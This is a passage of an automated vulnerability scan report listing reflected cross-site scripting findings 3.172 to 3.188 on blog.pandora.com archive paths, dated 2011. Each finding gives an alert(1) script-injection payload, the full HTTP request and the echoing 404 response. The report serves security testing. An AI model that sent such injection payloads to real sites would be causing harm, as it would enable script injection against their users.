Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ was not found on this server.</p>
...[SNIP]...

3.172. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)</script>b55ef145dcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ was not found on this server.</p>
...[SNIP]...

3.173. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)</script>e32ca06f3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ was not found on this server.</p>
...[SNIP]...

3.174. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)</script>b4e2002f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ was not found on this server.</p>
...[SNIP]...

3.175. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)</script>3e603248071 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ was not found on this server.</p>
...[SNIP]...

3.176. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)</script>b77f6aa2ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ was not found on this server.</p>
...[SNIP]...

3.177. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)</script>b71e5ef0a26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ was not found on this server.</p>
...[SNIP]...

3.178. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)</script>e78182be82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ was not found on this server.</p>
...[SNIP]...

3.179. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)</script>1ff330e9b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ was not found on this server.</p>
...[SNIP]...

3.180. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)</script>5c048a41cfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ was not found on this server.</p>
...[SNIP]...

3.181. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)</script>6c11535c8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ was not found on this server.</p>
...[SNIP]...

3.182. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)</script>858dc5f1838 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ was not found on this server.</p>
...[SNIP]...

3.183. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)</script>3afc3bd0abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ was not found on this server.</p>
...[SNIP]...

3.184. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)</script>5cbccb3c131 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ was not found on this server.</p>
...[SNIP]...

3.185. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)</script>c3f15fa67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ was not found on this server.</p>
...[SNIP]...

3.186. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)</script>b2d3b4a18a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ was not found on this server.</p>
...[SNIP]...

3.187. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)</script>350dc8da11b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ was not found on this server.</p>
...[SNIP]...

3.188. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)</script>419734980f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
